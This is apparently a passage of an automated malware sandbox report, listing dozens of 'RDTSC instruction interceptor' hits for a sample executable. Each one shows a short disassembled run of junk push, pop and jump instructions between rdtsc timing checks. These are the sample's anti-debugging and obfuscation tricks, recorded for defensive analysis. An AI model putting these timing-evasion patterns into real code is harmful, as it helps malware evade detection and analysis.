                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9F3A second address: CB9F57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F9C80FB566Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F9C80FB5666h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9F57 second address: CB9F80 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9C81394BF6h 0x00000008 jp 00007F9C81394BF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9C81394C03h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CB9F80 second address: CB9F90 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9C80FB5666h 0x00000008 js 00007F9C80FB5666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBA348 second address: CBA352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9C81394BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBA352 second address: CBA35B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBA35B second address: CBA361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBA51C second address: CBA521 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C40294 second address: C40298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF43C second address: CBF445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF445 second address: CBF449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF449 second address: CBF46E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5671h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F9C80FB5668h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF46E second address: CBF474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF5E8 second address: CBF60B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F9C80FB5666h 0x0000000f jmp 00007F9C80FB5674h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF60B second address: CBF616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF76A second address: CBF7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5677h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jmp 00007F9C80FB5678h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF7A0 second address: CBF7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBFD55 second address: CBFD5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBFFFD second address: CC0003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC0003 second address: CC0007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC0007 second address: CC000B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC000B second address: CC0038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9C80FB5666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f ja 00007F9C80FB5666h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pop esi 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9C80FB566Dh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC0038 second address: CC003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC078D second address: CC07AC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9C80FB5666h 0x00000008 jmp 00007F9C80FB5672h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC07AC second address: CC07F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F9C81394C08h 0x00000010 jmp 00007F9C81394C03h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F9C81394BFDh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC07F3 second address: CC07FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF019 second address: CBF01E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CBF01E second address: CBF06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9C80FB5666h 0x0000000a popad 0x0000000b pushad 0x0000000c jng 00007F9C80FB5666h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F9C80FB566Bh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jno 00007F9C80FB567Eh 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 jg 00007F9C80FB5666h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C3CC2A second address: C3CC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F9C81394C05h 0x0000000a jnp 00007F9C81394C15h 0x00000010 jmp 00007F9C81394C09h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CC6C72 second address: CC6C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB566Fh 0x00000009 pop edi 0x0000000a jnc 00007F9C80FB566Eh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC3F9 second address: CCC3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC3FF second address: CCC403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC403 second address: CCC409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC409 second address: CCC41A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F9C80FB566Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC41A second address: CCC42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9C81394BFDh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC42E second address: CCC45D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9C80FB566Ch 0x0000000f push eax 0x00000010 jmp 00007F9C80FB5676h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC45D second address: CCC462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCB14C second address: CCB17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007F9C80FB566Fh 0x0000000b pop edi 0x0000000c jns 00007F9C80FB566Eh 0x00000012 popad 0x00000013 pushad 0x00000014 jbe 00007F9C80FB566Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCB2E2 second address: CCB2E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCB6EE second address: CCB6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCAE88 second address: CCAE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCC102 second address: CCC10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CCF05B second address: CCF077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F9C81394BF6h 0x0000000a jmp 00007F9C81394C02h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD1D3E second address: CD1D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD1ED9 second address: CD1EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9C81394BF6h 0x0000000a jmp 00007F9C81394C03h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD1EFA second address: CD1F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD1F00 second address: CD1F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD206F second address: CD2073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD21D1 second address: CD21D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C43825 second address: C43840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5677h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C43840 second address: C43846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C41D17 second address: C41D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C41D1B second address: C41D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9C81394BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C41D2A second address: C41D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5670h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD8CCE second address: CD8CE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD8CE0 second address: CD8CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD8CE6 second address: CD8CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C825A6 second address: C825EC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9C80FB5666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D1E75h], edi 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F9C80FB5668h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 xor di, A4D6h 0x00000035 nop 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: C825EC second address: C82609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD94EC second address: CD94F2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD94F2 second address: CD94F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CD94F8 second address: CD9514 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB5675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDA08E second address: CDA09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDF0AA second address: CDF0BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C80FB566Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDF0BB second address: CDF0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDF0C1 second address: CDF0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9C80FB5666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE334 second address: CDE33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE33B second address: CDE340 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE340 second address: CDE346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE657 second address: CDE67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C80FB5670h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9C80FB566Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE67F second address: CDE683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE7E0 second address: CDE800 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9C80FB5676h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE800 second address: CDE811 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9C81394BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE811 second address: CDE817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE817 second address: CDE833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9C81394C08h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE833 second address: CDE839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CDE975 second address: CDE979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE18B4 second address: CE18B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE18B9 second address: CE18D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9C81394C04h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE1E1A second address: CE1E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE1E1E second address: CE1E66 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnc 00007F9C81394BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F9C81394BF6h 0x00000015 jmp 00007F9C81394BFAh 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007F9C81394C05h 0x00000021 pushad 0x00000022 popad 0x00000023 jno 00007F9C81394BF6h 0x00000029 popad 0x0000002a push ecx 0x0000002b jo 00007F9C81394BF6h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE1E66 second address: CE1EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F9C80FB5674h 0x0000000c push ebx 0x0000000d jmp 00007F9C80FB5674h 0x00000012 js 00007F9C80FB5666h 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F9C80FB5666h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEB930 second address: CEB934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEB934 second address: CEB93A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEB93A second address: CEB966 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9C81394BFBh 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F9C81394C07h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE9A05 second address: CE9A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F9C80FB5666h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE9A16 second address: CE9A45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9C81394C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9C81394C01h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE9A45 second address: CE9A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE9D5E second address: CE9D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CE9D64 second address: CE9D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEA071 second address: CEA07F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F9C81394BFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEA07F second address: CEA09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jmp 00007F9C80FB5674h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeRDTSC instruction interceptor: First address: CEA5C8 second address: CEA5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
